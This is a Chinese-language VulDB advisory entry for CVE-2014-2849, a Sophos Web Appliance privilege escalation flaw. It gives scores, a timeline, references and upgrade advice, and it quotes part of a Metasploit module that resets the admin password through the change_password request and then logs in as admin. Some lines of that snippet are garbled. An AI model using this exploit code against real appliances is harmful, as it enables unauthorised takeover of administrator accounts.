Sophos Web Appliance 直到 3.8.1 Change Password Dialog Box /index.php c 权限提升
| CVSS 元临时分数 | 当前攻击价格 (≈) | CTI兴趣分数 |
|---|---|---|
| 6.7 | $0-$5k | 0.00 |
摘要
在Sophos Web Appliance 直到 3.8.1中曾发现分类为致命的漏洞。 此漏洞会影响未知代码文件/index.php的组件Change Password Dialog Box。 手动调试的软件参数:c使用输入:change_password不合法输入可导致 权限提升。 该漏洞被标识为CVE-2014-2849, 此外,存在可用的漏洞利用。 建议对受到影响的组件升级。
细节
在Sophos Web Appliance 直到 3.8.1中曾发现分类为致命的漏洞。 此漏洞会影响未知代码文件/index.php的组件Change Password Dialog Box。 手动调试的软件参数:c使用输入:change_password不合法输入可导致 权限提升。 通过 CWE 声明此问题将指向 CWE-264。 此弱点已在 2014-04-09 由Brandon Perry 以Article 120230身份 以公告形式 (网站) 经由Zero Day Initiative (ZDI)公布。 分享公告的网址是sophos.com。 供应商曾参与漏洞披露过程。
该漏洞被标识为CVE-2014-2849, CVE分配信息格式:2014-04-11。 技术细节已提供。 该漏洞的知名度低于平均水平, 此外,存在可用的漏洞利用。 漏洞利用已被公开,可能会被利用。 当前漏洞利用价值为美元大约是 $0-$5k。 MITRE ATT&CK项目声明攻击技术为T1068。
它被宣布为高功能性。 该漏洞利用程序可在exploit-db.com下载。 该漏洞至少在26日被作为非公开零日攻击。 0日漏洞的地下市场估价大致为$0-$5k。 该漏洞利用所用的代码是:
passchange = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/index.php?c=change_password'),
'method' => 'POST',
'vars_post' => post
})
if
= 200
fail_with("Couldn't update admin's password")
end
print_status("Logging in as the admin now")
init = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php')
})
if
= 200
fail_with("Couldn't reget index page for admin auth")
end
init.body.each_line do |line|
next if line !~ /name="STYLE" value="(.*)"/
style = $1
end
post = {
'STYLE' => style,
'destination' => '',
'section' => '',
'username' => 'admin',
'password' => 'notpassword'
}
login = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php?c=login'),
'method' => 'POST',
'vars_post' => post
})
升级到版本3.8.2能够解决此问题。 建议对受到影响的组件升级。 该漏洞被披露后,此前未曾发表过可能的缓解措施。
此安全漏洞也被其他漏洞数据库收录:SecurityFocus (BID 66734), X-Force (92379), Secunia (SA57706) , SecurityTracker (ID 1030064)。
产品
供应商
名称
版本
许可证
网站
CPE 2.3
CPE 2.2
CVSSv4
VulDB 向量: 🔍VulDB 可靠性: 🔍
CVSSv3
VulDB 元基础分数: 7.5VulDB 元临时分数: 6.7
VulDB 基本分数: 7.5
VulDB 临时得分: 6.7
VulDB 向量: 🔍
VulDB 可靠性: 🔍
CVSSv2
| AV | AC | Au | C | I | A |
|---|---|---|---|---|---|
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
| 向量 | 复杂性 | 身份验证 | 保密 | 完整性 | 可用性 |
|---|---|---|---|---|---|
| 开锁 | 开锁 | 开锁 | 开锁 | 开锁 | 开锁 |
| 开锁 | 开锁 | 开锁 | 开锁 | 开锁 | 开锁 |
| 开锁 | 开锁 | 开锁 | 开锁 | 开锁 | 开锁 |
VulDB 基本分数: 🔍
VulDB 临时得分: 🔍
VulDB 可靠性: 🔍
NVD 基本分数: 🔍
利用
分类: 权限提升CWE: CWE-264
CAPEC: 🔍
ATT&CK: 🔍
身体的: 否
本地: 否
远程: 是
可用性: 🔍
访问: 公共
状态: 高功能性
作者: metasploit
编程语言: 🔍
下载: 🔍
Google Hack: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
价格预测: 🔍
当前价格估算: 🔍
| 0-Day | 开锁 | 开锁 | 开锁 | 开锁 |
|---|---|---|---|---|
| 今天 | 开锁 | 开锁 | 开锁 | 开锁 |
MetaSploit ID: sophos_wpa_iface_exec.rb
MetaSploit 名称: Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution
MetaSploit 文件: 🔍
Exploit-DB: 🔍
威胁情报
利益: 🔍活跃演员: 🔍
活跃的APT团体: 🔍
对策
建议: 升级状态: 🔍
反应时间: 🔍
0天时间: 🔍
利用延迟时间: 🔍
升级: Web Appliance 3.8.2
时间轴
2013-11-06 🔍2013-12-02 🔍
2014-04-08 🔍
2014-04-09 🔍
2014-04-09 🔍
2014-04-10 🔍
2014-04-10 🔍
2014-04-10 🔍
2014-04-11 🔍
2014-04-11 🔍
2014-04-11 🔍
2025-07-06 🔍
来源
供应商: sophos.com公告: Article 120230
研究人员: Brandon Perry
状态: 已确认
确认: 🔍
已协调: 🔍
CVE: CVE-2014-2849 (🔍)
GCVE (CVE): GCVE-0-2014-2849
GCVE (VulDB): GCVE-100-12864
X-Force: 92379 - Sophos Web Appliance change_password security bypass, High Risk
SecurityFocus: 66734 - Sophos Web Appliance Privilege Escalation and Remote Code Execution Vulnerabilities
Secunia: 57706 - Sophos Web Appliance Security Bypass Vulnerability, Less Critical
OSVDB: 105636
SecurityTracker: 1030064
scip Labs: https://www.scip.ch/en/?labs.20161013
其他: 🔍
另见: 🔍
条目
已创建: 2014-04-10 14時31分已更新: 2025-07-06 05時27分
更改: 2014-04-10 14時31分 (91), 2019-04-01 11時21分 (3), 2025-07-06 05時27分 (21)
完整: 🔍
Cache ID: 216:F0D:103
VulDB is the best source for vulnerability data and more expert information about this specific topic.
暂时没有任何评论。 语言: zh + en.
请登录后发表评论。